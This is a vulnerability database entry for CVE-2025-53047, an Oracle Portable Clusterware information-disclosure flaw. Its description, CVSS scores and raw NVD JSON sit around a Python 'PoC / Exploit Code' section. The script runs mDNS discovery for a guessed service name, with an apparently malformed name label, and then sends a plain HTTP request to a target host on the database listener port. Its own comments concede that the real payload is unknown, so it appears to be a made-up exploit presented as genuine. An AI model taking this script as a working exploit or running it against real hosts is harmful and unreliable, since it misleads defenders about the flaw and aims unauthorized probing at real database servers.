Security Vulnerability Report
CVE-2025-53047 CVSS 5.8 MEDIUM

CVE-2025-53047

Published: 2025-10-21 20:20:42
Last Modified: 2025-10-23 16:07:05

Description

Vulnerability in the Portable Clusterware component of Oracle Database Server. Supported versions that are affected are 19.3-19.28, 21.3-21.19 and 23.4-23.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via Bonjour to compromise Portable Clusterware. While the vulnerability is in Portable Clusterware, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Portable Clusterware accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N).

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

Oracle Database Server 19.3-19.28: cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:* - VULNERABLE
Oracle Database Server 21.3-21.19: cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:* - VULNERABLE
Oracle Database Server 23.4-23.9: cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:* - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53047 PoC - Oracle Portable Clusterware Information Disclosure
# Vulnerability: Unauthenticated read access via Bonjour protocol
# Affected: Oracle Database Server 19.3-19.28, 21.3-21.19, 23.4-23.9
import socket
import struct
import sys

def discover_bonjour_services(target_subnet='224.0.0.251', port=5353, timeout=5):
    """
    Discover Oracle Clusterware services via Bonjour/mDNS multicast
    """
    # mDNS query for Oracle Clusterware services
    mdns_query = b'\x00\x00'  # Transaction ID
    mdns_query += b'\x00\x00'  # Flags (standard query)
    mdns_query += b'\x00\x01'  # Questions: 1
    mdns_query += b'\x00\x00'  # Answers: 0
    mdns_query += b'\x00\x00'  # Authority: 0
    mdns_query += b'\x00\x00'  # Additional: 0
    # Query for _oracle_clusterware._tcp.local
    query_name = b'\x0c_oracle_cluster\x07ware\x04_tcp\x05local\x00'
    mdns_query += query_name
    mdns_query += struct.pack('>HH', 12, 1)  # Type PTR, Class IN

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.settimeout(timeout)
    try:
        sock.sendto(mdns_query, (target_subnet, port))
        while True:
            data, addr = sock.recvfrom(4096)
            print(f"[+] Discovered service at: {addr}")
            parse_mdns_response(data)
    except socket.timeout:
        print("[*] Discovery complete")
    finally:
        sock.close()

def parse_mdns_response(data):
    """Parse mDNS response to extract service information"""
    # Simplified parser for demonstration
    print(f"[*] Response data length: {len(data)}")
    # In real exploitation, extract service details and endpoints

def exploit_unauthorized_read(target_host, target_port):
    """
    Attempt unauthorized read access to Portable Clusterware
    """
    print(f"[*] Targeting {target_host}:{target_port}")
    # Craft malicious request to trigger information disclosure
    # Note: Actual exploit payload would depend on specific protocol implementation
    payload = b"GET /clusterware/status HTTP/1.1\r\n"
    payload += f"Host: {target_host}\r\n".encode()
    payload += b"Connection: close\r\n"
    payload += b"\r\n"
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        sock.send(payload)
        response = sock.recv(4096)
        print(f"[+] Received response ({len(response)} bytes)")
        # Response may contain sensitive cluster information
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 1521
        exploit_unauthorized_read(target, port)
    else:
        print("Usage: python poc.py <target_host> [target_port]")
        print("Running Bonjour discovery mode...")
        discover_bonjour_services()

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53047", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:42.277", "lastModified": "2025-10-23T16:07:04.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Portable Clusterware component of Oracle Database Server. Supported versions that are affected are 19.3-19.28, 21.3-21.19 and 23.4-23.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via Bonjour to compromise Portable Clusterware. While the vulnerability is in Portable Clusterware, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Portable Clusterware accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.3", "versionEndIncluding": "19.28", "matchCriteriaId": "A44BB715-42DA-4649-BBAA-8AA48F6DAEC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.3", "versionEndIncluding": "21.19", "matchCriteriaId": 
"1AD18CAC-40C7-4A13-8959-33972C8E093A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.4", "versionEndIncluding": "23.9", "matchCriteriaId": "8F8D00E7-212D-4484-935A-FA14427522AE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}